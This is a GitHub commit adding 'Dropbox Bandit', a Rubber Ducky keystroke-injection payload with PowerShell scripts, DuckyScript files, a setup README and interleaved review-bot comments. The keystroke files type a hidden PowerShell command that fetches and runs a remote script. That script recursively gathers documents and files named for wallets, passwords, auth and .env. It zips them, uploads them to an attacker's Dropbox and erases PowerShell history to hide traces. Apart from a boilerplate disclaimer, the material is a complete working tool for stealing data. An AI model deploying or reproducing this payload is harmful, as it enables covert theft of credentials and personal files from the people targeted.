Merge pull request #131 from Factor101/master

Added Payload: Dropbox Bandit
pull/156/head
hak5glytch 2022-10-09 11:15:09 -06:00 committed by GitHub
commit 27bd65fad0
5 changed files with 197 additions and 0 deletions


@ -0,0 +1,77 @@
# directory to steal from (ALL SUBDIRECTORIES INSIDE AS WELL)
$source = $env:USERPROFILE+"\Documents\*";
##############################################################################################
# Dropbox API values: Follow read.me tutorial to get these! #
##############################################################################################
# refresh_token
$refreshToken = "REFRESH_TOKEN_HERE";
# App key
$user = 'APP_KEY_HERE';
# App secret
$pass = 'APP_SECRET_HERE';
# temp directory to copy our files to
$dest = $env:TMP+"\cpy";
$n = 0;
$mb = 0;
# Delete the destination directory if it exists
if(Test-Path $dest) { rm -Path $dest -Force -Recurse; }
# find our files and copy them into the temp directory
GCI $source -R -I "*.txt","*wallet*","*.env",".x*",".doc*","*pass*","*auth*" | % {
$size = ((GCI $_.FullName).length/1MB);
# ignore files that are too big
if($size -lt 100) {
$mb += $size;
# once we come close to exceeding the dropbox upload limit we switch to a new folder
if($mb -ge 100) {
$mb = 0;
$n++;
}
ROBOCOPY $_.Directory ("$dest\$n\") $_.Name /MT 128 /NJH /NJS | Out-Null;
}
}
$creds = @{
grant_type = "refresh_token";
refresh_token = $refreshToken;
};
$headers = @{
"Authorization" = "Basic "+ [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes("${user}:${pass}"));
"Content-Type" = "application/x-www-form-urlencoded";
};
$accessToken = (Invoke-RestMethod https://api.dropbox.com/oauth2/token -Method Post -Body $creds -Headers $headers).access_token;
Add-Type -AssemblyName System.IO.Compression.Filesystem;
$d=get-date -f MM-dd-yyyy;
$t=get-date -f HH-MM-ss;
# convert our files to zip files and then upload to dropbox
for($i = 0; $i -le $n; $i++)
{
$zip = "$env:TMP\$env:USERNAME-$i-$t.zip";
[System.IO.Compression.ZipFile]::CreateFromDirectory("$dest\$i\", $zip, 0, $false);
$target="/$(hostname)-$env:USERNAME/$d/$env:USERNAME-$i-$t.zip";
$arg = '{ "path": "' + $target + '", "mode": "add", "autorename": true, "mute": false }';
$headers = @{
"Authorization" = "Bearer $accessToken";
"Content-Type" = "application/octet-stream";
"Dropbox-API-Arg" = $arg;
};
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $zip -Headers $headers | Out-Null;
}
# delete the temp directory
rm $dest -Force -Recurse;
# delete the zip files
for($i = 0; $i -le $n; $i++)
{
rm "$env:TMP\$env:USERNAME-$i-$t.zip" -Force;
}
# hide our traces (only will delay blue team -- not totally prevent them from seeing the traces)
Clear-History;
rm "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\*";
exit;
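Review bot: Lines 30, 72 and 80 delete data the script did not create: `rm -Path $dest -Force -Recurse` at line 30 removes any pre-existing `%TMP%\cpy` directory before this run has written anything into it, and line 80 wipes the user's entire PSReadLine history, which a `-NoP -NonI` session never writes to, so the current run leaves nothing there in the first place. In an authorized assessment that is out-of-scope destruction of the subject's own files, and the line 78 comment overstates what the two lines achieve, since console history is not where a downloaded script's execution is recorded. I would replace the line 78 comment with `# clears console history only; has no effect on host logging and removes the user's own PSReadLine history` and either drop line 80 or make line 30 fail rather than delete when `$dest` already exists. The minified variant repeats both deletions on lines 100 and 104.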


@ -0,0 +1,19 @@
# directory to steal from (ALL SUBDIRECTORIES INSIDE AS WELL)
$s=$env:USERPROFILE+"\Documents\*";
# filetypes to exfiltrate
$fileTypes="*.txt","*wallet*","*.env","*.x*","*.doc*","*pass*","*auth*";
##############################################################################################
# Dropbox API values: Follow read.me tutorial to get these! #
##############################################################################################
# refresh_token
$r="REFRESH_TOKEN_HERE";
# App key
$u = 'APP_KEY_HERE';
# App secret
$p = 'APP_SECRET_HERE';
# do not touch below this line unless you know what you're doing
$ds=$env:TMP+"\cpy";$n = 0;$mb = 0;if(Test-Path $ds){rm $ds -Fo -R;}GCI $s -R -I $fileTypes|%{$sz = ((GCI $_.FullName).length/1MB);if($size -lt 100){$mb+=$sz;if($mb -ge 100){$mb = 0;$n++;}ROBOCOPY $_.Directory ("$ds\$n\") $_.Name /MT 128 |Out-Null;}}
$a=(Invoke-RestMethod https://api.dropbox.com/oauth2/token -Method Post -Body @{grant_type = "refresh_token";refresh_token = $r;} -Headers @{"Authorization" = "Basic "+ [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes("${u}:${p}"));"Content-Type" = "application/x-www-form-urlencoded";}).access_token;
Add-Type -AssemblyName System.IO.Compression.Filesystem;$d=get-date -f MM-dd-yyyy;$t=get-date -f HH-MM-ss;for($i = 0;$i -le $n;$i++){$z="$env:TMP\$env:USERNAME-$i-$t.zip";[System.IO.Compression.ZipFile]::CreateFromDirectory("$ds\$i\",$z,0,$false);
Invoke-RestMethod https://content.dropboxapi.com/2/files/upload -Method Post -InFile $z -Headers @{"Authorization"="Bearer $a";"Content-Type"="application/octet-stream";"Dropbox-API-Arg"="{`"path`":`"/$(hostname)-$env:USERNAME/$d/$env:USERNAME-$i-$t.zip`",`"mode`":`"add`",`"autorename`":true,`"mute`":false}";}|Out-Null;}
rm $ds -Fo -R;for($i = 0;$i -le $n;$i++){rm "$env:TMP\$env:USERNAME-$i-$t.zip" -Fo;}Clear-History;rm "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\*" -Fo;exit;
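Review bot: Lines 94-98 embed a Dropbox refresh token, app key and app secret as cleartext literals, and the companion payload.txt instructs the operator to host this exact file on Pastebin or a public Dropbox link, so anyone who obtains the URL or a copy of the downloaded script holds write access to the account that receives the collected archives. Dropbox refresh tokens issued with `token_access_type=offline` do not expire on their own, so that exposure outlives the engagement unless someone acts. The README setup steps stop at uploading the script and never mention teardown; they should end with disabling the app or revoking the token once the archives have been retrieved, and the header comment here should state `# credentials below are stored in cleartext in the hosted script; revoke them after use`. The unminified variant on lines 20-24 carries the same literals.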


@ -0,0 +1,28 @@
REM Title: Dropbox Bandit
REM Author: Factor (github.com/Factor101)
REM Description: Extracts files from a specific location on a target's machine and uploads them to dropbox account
REM Target: Windows 10/11 (Powershell)
REM Version: 1.0
REM Category: Exfiltration
REM Legal: This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.
ATTACKMODE HID
REM Inital Delay
DELAY 500
REM Open CMD
GUI r
REM Delay to allow window to open
DELAY 100
REM Launch hidden powershell window to execute our script
REM Upload your ex.ps1 payload to pastebin or dropbox (or another website, if you want) and copy the URL here
REM if you're using dropbox ensure the link ends with ?dl=1 and not ?dl=0
REM if you're using pastebin ensure you're using the "raw" link e.g. http://pastebin.com/raw/<paste_id>
REM --------- replace me! ----------
STRINGLN powershell -w h -NoP -NonI -Exec Bypass "$e=$env:TMP+'\ex.ps1';iwr https://pastebin.com/raw/<paste_id> -O $e;iex $e;rm $e"
DELAY 200
REM Presses CAPSLOCK to indicate that payload is finished and you can remove the Ducky
CAPSLOCK
ATTACKMODE OFF
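Review bot: The comment `REM Open CMD` at line 119 does not describe the next line: `GUI r` opens the Windows Run dialog, and the PowerShell command on line 128 is typed into that dialog, not into cmd.exe, so `REM Open the Run dialog` is the accurate wording; `REM Inital Delay` at line 117 is also misspelled. The older-Ducky variant repeats both comments at lines 143 and 145 and additionally omits the `REM Legal:` header that line 115 adds to this file, so the two variants should carry the same header block.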


@ -0,0 +1,26 @@
REM Title: Dropbox Bandit
REM Author: Factor (github.com/Factor101)
REM Description: Extracts files from a specific location on a target's machine and uploads them to dropbox account
REM Target: Windows 10/11 (Powershell)
REM Version: 1.0
REM Category: Exfiltration
REM Inital Delay
DELAY 500
REM Open CMD
GUI r
REM Delay to allow window to open
DELAY 100
REM Launch hidden powershell window to execute our script
REM Upload your ex.ps1 payload to pastebin or dropbox (or another website, if you want) and copy the URL here
REM if you're using dropbox ensure the link ends with ?dl=1 and not ?dl=0
REM if you're using pastebin ensure you're using the "raw" link e.g. http://pastebin.com/raw/<paste_id>
REM --------- replace me! ----------
STRING powershell -w h -NoP -NonI -Exec Bypass "$e=$env:TMP+'\ex.ps1';iwr https://pastebin.com/raw/<paste_id> -O $e;iex $e;rm $e"
DELAY 200
ENTER
REM Presses CAPSLOCK to indicate that payload is finished and you can remove the Ducky
CAPSLOCK


@ -0,0 +1,47 @@
# **Dropbox Bandit**
This payload is designed to target Windows 10/11 machines, but but may run on older versions of Windows. If you are using an older Rubber Ducky please use the "payload_duckyscript_old.txt" file.
This payload extracts files from a specific location on a target's machine and uploads them in archives to a dropbox account. The actual payload takes about 5 seconds to run (faster on real machines, tested on virtual machine), but the actual exfiltration, which is invisible to the victim one started, can take longer depending on the total size of data to be uploaded.
**Configuration:**
- Selects a folder (and thereby all subfolders) to extract files from
- Select filetype(s) or filename(s) to target
- Dropbox account to use
**Payload Anatomy:**
- The payload runs a hidden and windowless powershell window which then downloads and executes the powershell script from a url.
- The powershell script finds all the files that match the chosen parameters and copies them to a directory in %temp%\cpy\0
- Once the amount of files in the temporary directory exceeds 100mb, close to the dropbox upload size limit, the script creates a new subdirectory
- The script obtains a token from the dropbox api to be used for uploading later, using the refresh_token (see info on how to get this token below)
- The script archives each of our subdirectories into zip files in %temp%, named like this: `${USERNAME}-${MM-dd-yyyy}-${HH-MM-ss}.zip`
- The script uploads each zip file to this folder on your dropbox account: `${hostname}-{USERNAME}/${MM-dd-yyyy}/`
- The script deletes the zip files and temporary directory
- The script deletes local powershell history and logs
- Script exits
## **Setup**
- Create a new Dropbox account
- [Create a new "App"](https://www.dropbox.com/developers/apps/create)
-- Select "Scoped Access"
-- Select "Full Dropbox"
-- Name it whatever you want
-- Go the the "Permissions" tab and enable "files.content.write", and "files.metadata.write"
-- Go to the "Settings" tab and copy your "App key" and "App secret"
-- Go to the "Settings" tab -> OAuth 2 -> Generated Access token and copy the token that you generate. **Important: This token will expire in 4 hours**, so you will only use this one to get your refresh token
-- Enter this link in your browser: https://www.dropbox.com/oauth2/authorize?client_id=YOUR_APP_KEY_GOES_HERE&token_access_type=offline&response_type=code, but ensure you replace "YOUR_APP_KEY_GOES_HERE" with your app key from above
-- Click "Continue" and "Allow" and then copy the token it gives you. This is your "refresh_token"
- Now that we have all our dropbox information, download the powershell script "ex.ps1"
-- Set $s to the folder you want to exfiltrate data from
-- Set $fileTypes to the filters for what files you want to grab
-- Set $r to your refresh token from above
-- Set $u to your App Key
-- Set $p to your App Secret
-- Save the script
- Select all the code your newly modified powershell script, and upload it to any of these:
-- Dropbox: Upload the script as a .ps1 file and copy the download link, replacing ?dl=0 at the end with ?dl=1
-- Pastebin: Upload the text and copy the "raw" version of the URL, e.g. [pastebin.com/raw/<script id>]()
-- [Spectre](https://www.klgrth.io/) (Pastebin alternative), Upload the text and copy the url; make sure your add /raw to the end of your url
- Enter the url into payload.txt
- Compile your payload using payloadstudio
This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.